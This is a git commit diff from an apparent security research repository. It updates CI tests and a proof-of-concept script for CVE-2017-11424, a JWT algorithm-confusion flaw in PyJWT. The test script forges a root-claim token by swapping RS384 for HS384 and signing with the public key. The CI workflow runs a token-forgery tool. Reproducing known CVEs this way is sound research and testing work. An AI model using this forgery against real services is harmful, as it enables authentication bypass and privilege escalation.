upgrade PyJWT

silentsignal · May 1, 2024 · c02c760 · c02c760
1 parent fa76c7e
commit c02c760
Show file tree

Hide file tree

Showing 3 changed files with 10 additions and 10 deletions.
diff --git a/.github/workflows/test-docker.yml b/.github/workflows/test-docker.yml
@@ -24,22 +24,22 @@ jobs:
 
     - name: Install Python dependencies for CVE-2017-11424
       run: |
-        python3.8 -m pip install --upgrade pip
-        pip3.8 install PyJWT==1.5.0
+        python -m pip install --upgrade pip
+        pip install PyJWT==1.7.1
 
     - name: Run RS256 test with CVE-2017-11424
       run: |
-        docker run rsa_sig2n python3.8 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS256/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS256/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS256.tokens
+        docker run rsa_sig2n python3 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS256/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS256/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS256.tokens
         ./test_scripts/test_CVE-2017-11424.sh CVE-2017-11424_RS256.tokens
 
     - name: Run RS384 test with CVE-2017-11424
       run: |
-        docker run rsa_sig2n python3.8 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS384/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS384/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS384.tokens
+        docker run rsa_sig2n python3 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS384/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS384/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS384.tokens
         ./test_scripts/test_CVE-2017-11424.sh CVE-2017-11424_RS384.tokens
     
     - name: Run RS512 test with CVE-2017-11424
       run: |
-        docker run rsa_sig2n python3.8 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS512/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS512/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS512.tokens
+        docker run rsa_sig2n python3 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS512/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS512/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS512.tokens
         ./test_scripts/test_CVE-2017-11424.sh CVE-2017-11424_RS512.tokens
 
 
diff --git a/CVE-2017-11424/requirements.txt b/CVE-2017-11424/requirements.txt
@@ -7,7 +7,7 @@ gmpy2==2.0.8
 prompt-toolkit==3.0.14
 pycparser==2.20
 pycrypto==2.6.1
-PyJWT==1.5.0
+PyJWT==1.7.1
 pyparsing==2.4.7
 six==1.15.0
 wcwidth==0.2.5
diff --git a/CVE-2017-11424/test_CVE-2017-11424.py b/CVE-2017-11424/test_CVE-2017-11424.py
@@ -16,16 +16,16 @@ def b64urlencode(m):
 private_key = open("standard.pem","r").read()
 public_key = open("standard.pub.pem","r").read()
 cve_exp=int(time.time())+86400
-cve = jwt.encode({"iss":"joe", "exp":cve_exp, "http://example.com/is_root": True}, private_key, algorithm="RS256")
-jwt.decode(cve, public_key, algorithm="RS256")
+cve = jwt.encode({"iss":"joe", "exp":cve_exp, "http://example.com/is_root": True}, private_key, algorithm="RS384")
+jwt.decode(cve, public_key, algorithm="RS384")
 cve_parts=cve.split(b'.')
 print(cve)
 cve_msg=b'.'.join(cve_parts[0:2])
 
 
 alg=b64urldecode(cve_parts[0].decode('utf8'))
-alg_tampered=b64urlencode(alg.replace(b"RS256",b"HS256"))
-tamper_hmac=b64urlencode(hmac.HMAC(public_key.encode('ascii'),b'.'.join([alg_tampered, cve_parts[1]]),hashlib.sha256).digest())
+alg_tampered=b64urlencode(alg.replace(b"RS384",b"HS384"))
+tamper_hmac=b64urlencode(hmac.HMAC(public_key.encode('ascii'),b'.'.join([alg_tampered, cve_parts[1]]),hashlib.sha384).digest())
 
 cve_tampered=b'.'.join([alg_tampered, cve_parts[1], tamper_hmac])
 print(cve_tampered)